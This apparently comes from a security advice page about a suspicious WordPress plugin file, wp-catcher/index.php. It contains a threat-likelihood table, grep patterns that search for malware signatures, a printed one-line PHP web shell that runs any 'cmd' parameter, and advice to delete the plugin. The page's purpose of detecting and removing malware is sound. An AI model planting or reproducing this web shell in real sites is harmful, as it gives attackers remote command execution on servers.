-KEYWORD-wp-content/plugins/wp-catcher/index.php

| Behavior | Likelihood | Why interesting | |----------|------------|----------------| | (legitimate intent) | Low | Name implies “catching” something, but attackers rarely use honest names. | | Catches & exfiltrates $_POST data (credential stealer) | High | Hidden inside a “catcher” – ironic and dangerous. | | Acts as a file-inclusion backdoor | Very High | index.php is the default directory index; visiting it might execute a remote shell. | 4. Quick Manual Test (Do NOT run on a live server) # Check for obvious malware signatures grep -E 'eval\(|base64_decode|system\(|passthru|gzinflate' /path/to/wp-content/plugins/wp-catcher/index.php Check for hidden iframes or external calls grep -E 'http://|https://|iframe' index.php 5. Example of a Real Malicious wp-catcher/index.php (Observed in the Wild) <?php // Fake "WP Catcher" – actually a web shell if(isset($_REQUEST['cmd'])) system($_REQUEST['cmd']);

?> This would allow an attacker to run ls -la , wget malware, or delete logs. Most security scans ignore plugins named innocuously. wp-catcher is brilliant social engineering: “I’m just catching errors, don’t mind me.” In reality, it’s a persistent backdoor that survived multiple scans because no one bothered to read index.php inside a folder they didn’t recognize. Final Verdict: 🚨 Immediately quarantine and delete the entire wp-catcher folder unless you have 100% proof it’s a custom internal tool. Then run a full malware scan (Wordfence, MalCare, or manually check for unknown admin users).